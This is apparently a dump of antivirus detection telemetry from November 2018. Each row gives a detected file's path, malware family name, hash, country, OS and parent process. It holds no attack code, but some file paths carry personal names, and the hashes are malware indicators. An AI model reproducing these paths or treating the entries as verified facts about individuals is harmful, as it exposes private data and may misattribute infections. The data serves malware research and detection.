  Row(detection=Row(filename='tmp00007705', filepath='C:\\Windows\\Temp\\c83c1a5d-6431-4dff-9964-1a72d49b4299\\tmp000002da\\tmp00007705', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='a7c3d130da551f228d9d026cd0580892af7aa2da431bdae2dfacd35af50faeec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T11:13:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsb7E06.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='OM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T14:54:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\o5z1vhgkgzt\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541012649.5bd9fca932ce3', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Backs\\636713205.exe', parentsize=671232, timestamp='2018-11-01T12:05:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sclipei tabita.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\SCLIPEI TABITA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:07:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ebc3c31328d3e062a4cae121b7ff8441a9beefe61fefaddd01a462789bb5fcb4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:52:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152835-d5202c64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152835-D5202C64', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:28:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new folder(2).exe', filepath='E:\\New Folder(2).exe', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:35:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='master.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\MASTER.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:02:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='materiale didattico.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='careddu maria sonia.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\CAREDDU MARIA SONIA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-200040-b426bd0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60307d59\\AVSCAN-20181104-195731-99D479CF\\AVSCAN-20181104-200040-B426BD0E', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:00:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T06:52:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=6144000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='3103b125bba55051f5b49fa535b5c9bc9de94bc63230cbdd7f353e1660a24d00', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T13:35:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\Shaan\\AppData\\Local\\Temp\\tmp3566068\\MNNStubSetup.exe', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='8', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:50:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161511-c4876a62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161511-C4876A62', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:15:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00088046', filepath='C:\\Windows\\Temp\\53f972a6-1cff-41af-bddc-52c0d729daa2\\tmp000007c3\\tmp00088046', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='68b926503066d0e40024a9897ad189a1d7111e12d9b7024c154a06ff28ca684e', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.5.202.7299\\AdAwareService.exe', parentsize=713568, timestamp='2018-11-04T11:07:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Anubis-Lineage Mobile Bot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:56:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:30:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='iiwusqomkv.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\iiwusqomkV.exe', filesize=85584000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='8bc154916474de9fcf7b18d62ec08a73e7d5c869bc477c4063d85171d3967601', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23808, timestamp='2018-11-04T00:04:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='اسطوانة تدمير المواقع.exe', filepath='F:\\010\\اسطوانة تدمير المواقع.exe', filesize=21184000, name='TR/Dropper.MSIL.Gen.#M300.#R5803'), hash='215cd85150dbb518e20a065449b491880fcbd170617d06d31c117d4961dc915c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T21:22:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-232344-b7a6e804', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2363477e\\AVSCAN-20181103-211632-74D9328B\\AVSCAN-20181104-232344-B7A6E804', filesize=368000, name='TR/Obfuscate.a6b917.#M1.#R1'), hash='a6b91739301a52fcb95ef7b5844e923602f5da85c13cbdd5736ad6f2c5df0226', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:23:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.gh', filepath='C:\\Users\\X\\AppData\\Local\\GamerHash\\miners\\ewbf_v1\\miner.gh', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\GamerHash\\1.21.7\\GamerHash.exe', parentsize=2147288, timestamp='2018-11-04T17:35:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\HTTPERR\\MsiexeC64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T23:03:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132612-5b078f69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132612-5B078F69', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:26:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133347-5f6425f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_94ce1b23\\AVSCAN-20181104-132743-3304821C\\AVSCAN-20181104-133347-5F6425F2', filesize=1536000, name='PUA/AD.BitcoinMiner.B.#M1.#R1'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:33:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131408-3d00ba5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee46060\\AVSCAN-20181104-131302-31082F88\\AVSCAN-20181104-131408-3D00BA5A', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-043008-b0602897', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78c785a0\\AVSCAN-20181105-042322-7C781D36\\AVSCAN-20181105-043008-B0602897', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:30:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:49:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192319-8d66d8f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b217c396\\AVSCAN-20181104-191154-57B33C47\\AVSCAN-20181104-192319-8D66D8F6', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:23:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002435a', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002435a', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:46:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spinstall.exe', filepath='G:\\SPDMTK FILES\\Lenovo\\Lenovo_A606_S039_150604_ROW_(by_firmwarefile.com)\\Lenovo_A606_S039_150604_ROW\\Driver\\Auto Installer Driver v1.1236.00\\SmartPhoneDriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AG.#M1.#R1'), hash='26a1024a60ce7cd98daedd9eb498992487bb68d14863353108f6eded6ad73c7a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-04T03:23:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-04T01:14:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:40:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T23:48:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:08:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0008f03f', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp0008f03f', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:06:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='frghw.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsf3582.tmp\\frghw.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M300.#R5697'), hash='555ac4eaff7b8bcf964d627b5e4a497896a066eda5217c2ef82796731722f600', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:36:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kpzstool.exe', filepath='D:\\KOPLAYER\\Tools\\kpzstool.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='564dafb8421739ef9ff8904e023dfed21509d3bba9d719953e124740cb51ed71', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\regsvr.exe', parentsize=1136128, timestamp='2018-11-04T06:36:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='p3core.dll', filepath='C:\\Program Files (x86)\\Euro Truck Simulator\\p3core.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='6dd0107c98d39c177111a23343585d3b81fd210a0b26af545c1aa187d085bda9', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T15:35:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='7901f5fe2ec9c2078247e9718d569846e1ac3969', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\7901f5fe2ec9c2078247e9718d569846e1ac3969', filesize=320000, name='Adware/DealPly.c4bf8f.#M1.#R1'), hash='c4bf8f70268e35d4f76d808d124745c733049838cc534ef5a70d194c91210b51', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:35:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:04:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00001200', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp00001200', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:49:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T04:52:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='play cracked.exe', filepath='D:\\Minecraft - Star Wars\\play cracked.exe', filesize=192000, name='TR/Rogue.192000.9.#M1.#R1'), hash='767e7cef883679bed2576504ca4cf079d8cf48360f85e2d79fc4d41f73a2610e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:47:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140242-f11d422f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140242-F11D422F', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hl.exe', filepath='\\\\?\\D:\\Games\\Counter-Strike Global Offensive 1.0\\hl.exe', filesize=5888000, name='SPR/GameHack.6980e9.#M1.#R1'), hash='6980e96106136eb42b4248e91bea4f08b08c5ec3a21151e9513d02edf45a74ae', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:16:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='41f4e1ca0527ef475d60ba8bb930c03a3b2118410faddb35c3fbd949298ae520', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries31.10.2018-29.available\\Avira\\41F4E1CA0527EF475D60BA8BB930C03A3B2118410FADDB35C3FBD949298AE520', filesize=812000, name='W32/Parite.#M1.#R1'), hash='41f4e1ca0527ef475d60ba8bb930c03a3b2118410faddb35c3fbd949298ae520', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-04T08:26:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ioc605399e4-5712-0443-8eba-d0c0348d53cf', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc605399E4-5712-0443-8EBA-D0C0348D53CF', filesize=372000, name='TR/Dropper.Gen.#M300.#R2295'), hash='a97f619197743a38e1c86adadc9762d8ce2fe76050a622b3e8f6ba94d5952929', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:31:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:16:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cryptbase.dll', filepath='\\\\?\\C:\\ProgramData\\L0OYMXAEWJUQIKV\\cryptbase.dll', filesize=864000, name='HEUR/AGEN.1023522.#M1.#R1'), hash='5f31782af7afcf068167713dc72243c1ae3ed8af6ebdf1416e432dff16b1dbbe', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:44:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151100-74631bf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68883beb\\AVSCAN-20181104-150843-60812614\\AVSCAN-20181104-151100-74631BF2', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:10:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:08Z'), dt=datetime.date(2018, 11, 4)),
